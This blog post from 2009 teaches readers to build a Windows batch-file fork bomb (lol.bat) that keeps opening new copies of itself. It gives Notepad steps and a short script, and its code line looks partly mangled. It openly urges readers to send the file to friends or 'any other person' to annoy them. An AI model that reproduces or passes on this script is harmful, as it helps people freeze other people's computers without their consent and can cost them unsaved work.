Thursday, June 11, 2009

Fork Bomb :: Make the other person mad!!

·

Okay, many of you would know this but still I'm posting this.

This is a simple Command Prompt trick. After you open this file, it would multiply its window to some extent, opening many many windows and its really Annoying..... Believe me... Try it on your PC only when you are ready to shutdown the PC.

Okay, so lets begin...

1. Open Notepad( Go to Start Menu --> Run -->notepad and press enter.)
2. Paste the following code into the file and save it as lol.bat

@echo off :laugh: :laugh:
start lol.bat
Just remember one thing that you have to save as lol.bat ....

That's it and its done...

Send it to your friends or any other person and they are gonna get annoyed.........

Feel free to contact me if you need any extra help regarding this.




Spread Firefox Affiliate Button

If you like this article then you may also like receiving free daily updates directly in your email (one email per day).

Subscribe new articles by RSS feed or by Email

Enter your email address:




Related Posts by Categories



0 comments:

Post a Comment

Comments On Learn Zone are Moderated by me and only then they shall appear here. Please do not spam in the comment box.

About Me

My name is Aneesh Bhatnagar. I am a student in Class XI,like blogging and helping out others with different softwares... Well, That's all i can say about me... Have any queries???Mail me at : persnalid@gmail.com